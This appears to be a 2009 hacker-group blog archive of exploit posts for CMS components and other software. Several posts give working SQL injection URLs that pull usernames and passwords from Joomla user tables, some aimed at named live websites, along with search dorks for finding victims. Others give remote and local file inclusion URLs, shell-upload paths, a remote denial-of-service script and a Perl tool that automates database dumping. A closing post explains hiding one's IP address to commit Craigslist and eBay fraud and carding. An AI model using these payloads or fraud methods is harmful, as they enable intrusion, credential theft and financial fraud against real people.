matthews

merry christmas 2009 and happy new year 2010

2009-12-23T19:06:00.000-08:00

Praying the blessings of the season
will refresh you this Christmas and
throughout the coming year

Eurologon CMS SQL Injection Vuln

2009-12-14T06:25:00.001-08:00

Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?id=[SQL]

[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*

[o] Dork
"Powered by Eurologon"

[o] Notes
this is a private script.

Joomla Component com_lyftenbloggie Remote SQL injection vulnerability

2009-11-28T05:46:00.000-08:00

#############################################################################################
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ##
## Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
#############################################################################################

[ Software Information ]

[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5. LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_lyftenbloggie" / "Powered by LyftenBloggie"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################

[ Vulnerable File ]

http://server/index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER]

[ Exploit ]

http://server/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--

#############################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Setelah Bertapa kagak jelas sama Om Don Tukuesto ... akhirnya nemu lobang :D
[+] M3NW5 Ku tunggu di kotaku ... wkwkwkw

[ QUOTE ]

[+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih Ntah di mana kao sekarang sayang ..
[+] AURAKASIH telpon gua yach .. hha

Flashden Shell Upload Vulnerability

2009-11-27T00:53:00.000-08:00

# Exploit Title: Flashden Shell Upload Vulnerability

# Date: 26.12.2009

# Author: DigitALL

# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members

# Vendor: http://www.jurgenvisser.nl

# Version: 2.0

# Dork: inurl:"select_file2.php"

# Application: Please Add Files ( Your Shell ) And Upload.

# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back dir.

Idul-Adha 1428H

2009-11-25T18:21:00.000-08:00

selamat merayakan idul adha 1428 H

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

2009-10-15T19:10:00.001-07:00

/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file(spider.sav) will result in a local crash
of Spider Solitaire
*/
$username="pwn"; //Replace with your computer username
$file="spider.sav";
$junk="Spider Solitaire Local Crash";
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle,$junk);
fclose($handle);
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";
if(!copy($file,$file2))
{
die("Can't copy file");
}
else
{
echo "File succesfully copied.Open Spider Solitaire and load the
last saved game";
};
?>

ZoIPer v2.22 Call-Info Remote Denial Of Service

2009-10-15T19:09:00.001-07:00

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09

import sys
import socket
import os

def main(argc , argv):

if len(sys.argv) != 2:
os.system("cls")
sys.exit("Usage: " + sys.argv[0] + " \n")

target_host = sys.argv[1]
target_port = 5060

evil_packet =
"\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"

os.system("cls")
print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
print "[+] Exploited By Gr33n_G0bL1n\r\n"
print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_host,target_port))
print "[+] Trying To Send Evil Packet...\r\n"
s.sendall(evil_packet)
s.close()
print "[+] Done!\r\n"
except:
print "[x] Connection Error!\r\n"

if (__name__ == "__main__"):
sys.exit(main(len(sys.argv), sys.argv))

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

2009-10-15T19:08:00.000-07:00

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 06.08.2009

Risk: High

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.10

Original URL:
http://securityreason.com/achievement_securityalert/65

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.ini-restore.php

ini_restore ? Restores the value of a configuration option

ini_restore ( string $varname )

- --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem exist in restoring php config environments. To demonstrate
the problem, we need to declare variables via ini_set() function. When we
try use ini_restore(), variables in class PG() will indicate any part of
memory.

- ---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage
TSRMLS_DC) /* {{{ */
{
if (ini_entry->modified) {
if (ini_entry->on_modify) {
zend_try {
/* even if on_modify bails out, we have to continue on with restoring,
since there can be allocated variables that would be freed on MM
shutdown
and would lead to memory corruption later ini entry is modified again
*/
ini_entry->on_modify(ini_entry, ini_entry->orig_value,
ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2,
ini_entry->mh_arg3, stage TSRMLS_CC);
} zend_end_try();
}
if (ini_entry->value != ini_entry->orig_value) {
efree(ini_entry->value);
}
ini_entry->value = ini_entry->orig_value;
ini_entry->value_length = ini_entry->orig_value_length;
ini_entry->modified = 0;
ini_entry->orig_value = NULL;
ini_entry->orig_value_length = 0;
if (ini_entry->modifiable >= (1 << 3)) {
ini_entry->modifiable >>= 3;
}
}
return 0;
}
- ---zend_ini.c---

Flag modified will be reset, and we can not considered modified variable.
We don't check value of ini_entry->on_modify() and PG() will be now out of
memory range.

To demonstrate this issue

- ---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>
127# php /var/www/www/sess.php AAA
PHP Warning: session_start():
open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct ($|ma: no-cache)
in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning: session_start():
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (¤^j|ma: no-cache)
in Unknown on line 0
- ---example0 (5.2.10/5.3.0)---

The main problem is started in ini_restore("session.save_path"). To show
this issue, we need use some function with PG() inside (like:
session_start()).

- ---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyrght (c) 1998-2009 Zend Technologies
127# cat /www/file.php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");

include("B");

?>

127# php /www/file.php
PHP Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7

Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7
PHP Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7

Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7
PHP Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

127# curl http://localhost/file.php

Warning: include() [href='function.include'>function.include]: open_basedir restriction in
effect. File(B) is not within the allowed path(s): (°?e»Hup») in
/www/file.php on line 7

Warning: include(B) [href='function.include'>function.include]: failed to open stream:
Operation not permitted in /www/file.php on line 7

Warning: include() [href='function.include'>function.include]: Failed opening 'B' for
inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on
line 7

- ---example1 (5.3.0)---

Variable PG(open_basedir) is now out of range. So any function (like:
include()) with

php_error_docref(NULL TSRMLS_CC, E_WARNING, "open_basedir restriction in
effect. File(%s) is not within the allowed path(s): (%s)", path,
PG(open_basedir));

will print memory

examples:
- ---
Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (¤©f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (,ªf»aaaaaa) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (?¬f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (ÈËe»ef_root)
in /www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (4Íe»r.ini) in
/www/ssij.php on line 8
- ---

Variables in class PG, may take any value.
So code such as

if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC))

can be manipulated.

But not only zend_ini.c have issue. When we try use ini_set() and
ini_restore() for error_log, php will crash.

Function OnUpdateErrorLog, dosen't check that new_value is empty (null
point). It should provide to crash.

- ---main.c---
static PHP_INI_MH(OnUpdateErrorLog)
{
...
/* Only do the safemode/open_basedir check at runtime */
if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS)
&& strcmp(new_value, "syslog")) {
...
- ---main.c---

strcmp(3) will check new_value. So new_value can not be NULL.

here:

STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
error_log, php_core_globals, core_globals)

default error_log is NULL

...("error_log", NULL,...

so if we put some string, and remove it, php should crash

127# php -r 'ini_set("error_log","A");ini_restore("error_log");'
Segmentation fault (core dumped)

127# gdb -q php
(gdb) r -r 'ini_set("error_log","A");ini_restore("error_log");'
Starting program: /usr/local/bin/php -r
'ini_set("error_log","A");ini_restore("error_log");'

Program received signal SIGSEGV, Segmentation fault.
0x288ee410 in strcmp () from /lib/libc.so.7

bt:
#0 0x288ee410 in strcmp () from /lib/libc.so.7
#1 0x081c7b85 in OnUpdateErrorLog (entry=0x28a65a80, new_value=0x0,
new_value_length=3, mh_arg1=0x38, mh_arg2=0x83d5420, mh_arg3=0x0,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/main/main.c:354
#2 0x0824cb85 in zend_restore_ini_entry_cb (ini_entry=0x28a65a80,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/Zend/zend_ini.c:55
#3 0x0824d3f5 in zend_restore_ini_entry (name=0x28a1e36c "error_log",
name_length=10, stage=16)
...

Functions like OnUpdateErrorLog, should check, that new_value is not a NULL
pointer.

- --- 2. Fix ---
(5.3.0):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c

(5.2.10):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c

- --- 3. Greets ---
stas

sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkp7FoMACgkQpiCeOKaYa9YWFwCbBhEvA69nQDgwXyuDdU8wbjmu
ZIEAniHiQ3puTKqEtw9u8g6/T/806j7A
=DvtO
-----END PGP SIGNATURE-----

playSMS ver 0.9.4 RFI & LFI Vulnerability

2009-10-15T18:54:00.000-07:00

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]

Download:http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]

file: /lib/function.php

// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php"; line 8
include "$apps_path[libs]/fn_phonebook.php"; line 9
include "$apps_path[libs]/fn_core.php"; line 10
include "$apps_path[libs]/fn_themes.php"; line 11

// init global variables
include "$apps_path[libs]/lib_init1.php"; line 14

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom1.php"; line 17

// init global variables
include "$apps_path[libs]/lib_init2.php"; line 65

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom2.php"; line 68

http://localhost/[path]/lib/function.php?apps_path[libs]=[tutung-RFI]

[o]====================================[o]

file: /plugin/themes/default/init.php

include $apps_path[themes]."/".$themes_module."/config.php";
include $apps_path[themes]."/".$themes_module."/fn.php"; line 3

http://localhost/[path]/plugin/themes/default/init.php?apps_path[themes]=[tutung-RFI]
http://localhost/[path]/plugin/themes/default/init.php?themes_module=[tutung-LFI]

[o]====================================[o]

file: /plugin/gateway/gnokii/init.php

include "$apps_path[plug]/gateway/$gateway_module/config.php"; line 2
include "$apps_path[plug]/gateway/$gateway_module/fn.php"; line 3

http://localhost/[path]/plugin/gateway/gnokii/init.php?apps_path[plug]=[tutung-RFI]
http://localhost/[path]/plugin/gateway/gnokii/init.php?gateway_module=[tutung-LFI]

[o]====================================[o]

i think bug was publish by
ahmadbady [kivi_hacker666@yahoo.com] at playSMS version 0.9.3
but vendor still don't have update the bug at playSMS version 0.9.4,
so it's not same version right? :D

colek-colek
: All Brotha Antisecurity[dot]Org www.MainHack.net www.ServerIsDown.org
Jack-, Vrs_hCk, OoN_Boy, NoGe, zxvf, Yadoy666, s3t4n, r3v4n_b4st4rd,
pizzyroot,
em|nem, s4va,
kecemplungkalen, xr00tb0y
xshadow, Tante Angela Chang, IrcMafia
Indonesian Coder
Don Tukulesto, M3NW5, m364tr0n, cyb3r_tr0n

./noname

[o]====================================[o]

jasakom has been hacked

2009-10-04T04:55:00.001-07:00

Redcat Media SQL Injection Vulnerability

2009-10-04T04:51:00.002-07:00

x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]

| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 oktober 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : “Powered by RedCat” inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

[x]==========================================[x]

| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; [...]

Community Translate RFI Vuln

2009-10-04T04:51:00.001-07:00

[o] Community Translate Remote File Inclusion Vulnerability
Software : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]

Dazzle Blast RFI Vuln

2009-10-04T04:50:00.000-07:00

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');

admin/includes/createemails.php

[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]

Simple SQLi Dumper (SSDp) v0.1 GUI

2009-09-28T20:04:00.000-07:00

take from c0li.m0de.0n

<?

#!/usr/bin/perl



# Simple SQLi Dumper (SSDp) v2.2

# Coded by Vrs-hCk

# ander[at]antisecurity.org

# Anti Security Team



# Example: http://localhost/index.php?id=-1+union+select+1,2,3,c0li,5



use HTTP::Request;

use LWP::UserAgent;



my $c0de = "0x63306C69";

my $logo = "SSDp";



print "\n *************************************\n";

print " *       Simple SQLi Dumper 2.2      *\n";

print " *          Coded By Vrs-hCk         *\n";

print " *  MainHack.net - AntiSecurity.org  *\n";

print " *************************************\n\n";



print " [$logo] SQLi URL (c0li inside) : "; chomp ($sqli = );

print " [$logo] SQLi End Tag : "; chomp ($sql_end = );



print " [$logo] DB Name (leave blank for use current db) : "; chomp ($db_name = );

print " [$logo] Table Name : "; chomp ($table_name = );

print " [$logo] Columns Name (separate by comma char) : "; chomp ($columns = );



print " [$logo] Start Limit : "; chomp ($id_start = );

print " [$logo] Stop Limit : "; chomp ($id_end = );

print " [$logo] Log File : "; chomp ($sql_log = );



print "\n [$logo] DUMPING DATA ...\n\n";



my $concat = "CONCAT(".$c0de.",CONCAT_WS(0x3a,$columns),".$c0de.")";

my $query = str_replace($sqli,"c0li",$concat);

print " [$logo] [$table_name] $columns :\n\n";



for ($id=$id_start; $id<=$id_end; $id++) { 	my $exploit = $query."+FROM+".$db_name.".".$table_name."+LIMIT+".$id.",1".$sql_end; 	if ($db_name eq "") { $exploit = $query."+FROM+".$table_name."+LIMIT+".$id.",1".$sql_end; } 	my $res = get_content($exploit); 	if ($res =~ m/c0li(.+?)c0li/g) { 		my $data = $1; 		open(DAT,">>$sql_log") || die(" [$logo] Cannot Open File.\n");

		print DAT "$data\n";

		close(DAT);

		print " [$logo] ID ($id) $data\n";

	}

}



print "\n [$logo] Finish.\n\n";



sub str_replace {

	my $source  = shift;

	my $search  = shift;

	my $replace = shift;

	$source =~ s/$search/$replace/ge;

	return $source;

}



sub get_content() {

	my $url = $_[0];

	my $req = HTTP::Request->new(GET => $url);

	my $ua  = LWP::UserAgent->new();

	$ua->timeout(10);

	my $res = $ua->request($req);

	if ($res->is_error){

		print " [$logo] ID [timeout]\n";

	}

	return $res->content;

}



# AntiSecurity.org [10-09-2009]

Metasploit Framework

2009-09-27T21:32:00.000-07:00

Metasploit provides useful information to people who
perform penetration testing,IDS signature development,
and exploit research. This project was created to
provide information on exploit techniques and to
create a useful resource for exploit developers
and security professionals. The tools and information
on this site are provided for legal security research
and testing purposes only.Metasploit is a community project

managed by Metasploit LLC.



Metasploit 3.3 for WIN.32

Metasploit 3.3 for UNIX

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

2009-09-27T20:53:00.000-07:00

#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()

Mambo/Joomla SQL Injection Vulneralbility

2009-09-25T04:30:00.000-07:00

#######################################################
## Mambo/Joomla SQL Injection Vulneralbility ##
## Component : com_tupinambis ##
## Release : September 23, 2009 ##
## --------------------------------------------------##
##.---..-..-..-.,-..-..-..-. .---..---..---..----. ##
##`| |'| || || . < | || || |__ | |- \ \ `| |'| || | ##
## `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ##
##-------------------------------------------------- ##
#######################################################

[+] Author : Don Tukulesto
[+] Homepage : http://www.indonesiancoder.com
[+] Location : Republik Indonesia

#######################################################

[ Software Information ]

[+] Software : com_tupinambis
[+] Version : 1.0
[+] Vendor : www.tupinambis.net
[+] Download :
http://www.onestopjoomla.com/extensions/auction/tupinambis/
[+] Vulnerability : SQL Injection
[+] Google Dork : xxxxxxx

#######################################################
[ ExPL0!T ]

[+] Mambo :
http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=
-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,
9,10,11+from+mos_users--

[+] Joomla :
http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=
-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,
9,10,11+from+jos_users--

#######################################################

[ Greetings ]

[+] All of Indonesian Coder Member, M3NW5, mistersaint, gonzhack, m364tr0n,
cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Quick_5ilv3r, ran, m4ho666, Den Bayan, vyc0d, bh4nd55,
Den Awink
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO,
DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666 + tante Miya, kecemplungkalen,
xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom, Pathloader, tiw0L,
[+] V3n0m, Str0ke, sp3x, todd, Antisecurity.org, and YOU !!!

[ SHOUT ]

Happy Eidul Fitri 1430H.

Minal Aidin Wal Faidzin.

[ SP3C!AL ]

lovely Emak, Bapak, Adek ku sayang (^_^)

Joomla Component com_fastball (league) Remote SQL Injection Vulnerability

2009-09-25T04:25:00.000-07:00

###########################################################################
##################################
## Joomla Component com_fastball Remote SQL injection vulnerability -
(league) ##
## Author : kaMtiEz (kamzcrew[at]gmail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 23, 2009 ##
###########################################################################
##################################
# Hello My Name Is :
##
# __ _____ __ ._____________
##
# | | _______ / \_/ |_|__\_ _____/_______
##
# | |/ /\__ \ / \ / \ __\ || __)_\___ /
##
# | < / __ \_/ Y \ | | || \/ /
##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \
##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER
-=- KILL-9 CREW -=- ##
###########################################################################
##################################

[ Software Information ]

[+] Vendor : http://www.fastballproductions.com/
[+] Download :
http://www.fastballproductions.com/index.php?option=com_digistore&task=list
_products&id=1&Itemid=32
[+] version : 1.1.0 - 1.2
[+] Vulnerability : SQL injection
[+] Dork : xxxxxxx
[+] Location : INDONESIA
###########################################################################
##################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+f
rom+jos_users--

###########################################################################
##################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong
and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma
gue .. hahaha
[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha

How to hide your IP

2009-09-23T02:37:00.000-07:00

I know many of you hiding ip's via Socks or poxy..that's shit...sorry but if they have java they can get ur ip even if u are connected thrhough a socks.

So. If u have a good connection at internet you can use this softwares:

1. Local ip > AOL ( using aol 9.1 or AOL desktop 10.)
To configure your ip to use AOL USA ip class you have to do go to:
Open Aol 9.1 > Connection options > Advanced Broadband Settings > continue > & at Broadband u will see something " You are curently editing settings for Broadband, than click and go down to Add a Broadband profile > Put any profil name you want > than down to Connection Type click on Home Network. and SAVE

This is how you get IP privat from AOL.

BUT what you guys didnt know and I am 100% sure about that...AOL have their ip in black list. So to have a PURE and NON blacklisted IP from AOL after you have did this setup you have to:

Connect using this settings, test your ip at [url="http://www.showmyip.com/?version=full"]http://www.showmyip.com/?version=full[/url] and see if ur ip address is from United States verified, if yes than disconect close AOL from taskmanager anything that AOL have than

Download AOL DEsktop ( AOL 10 ), install and make the same connection settings IF those settings are not already same as AOL 9.1. after that DONT open AOL desktop

Open AGAIN aol 9.1 from program files > aol 9.1 > waol.exe than try to connect, You will get an error first time but second time it will work

Usualy 70% of times it will give u an ip with 172.191, 172.192, 172.193 many of those IP's are not in blacklist

For those who is making fake auctions on Craiglist, you might need to know this way u will NOT have to register and make phone registration...YOU dont need to register..you can put FREE POST on AUTOS with no phone required or no Craigslist account

For those who Are making fraud on Ebay same thing...this non blacklist aol put you on website in like 2 hours instead of 8 or not puting u at all on ebay Autos.

Some times XP or VISTA dont kick AOL even if u are kicked from task manager so...Better on carding make a new User on your computer for example
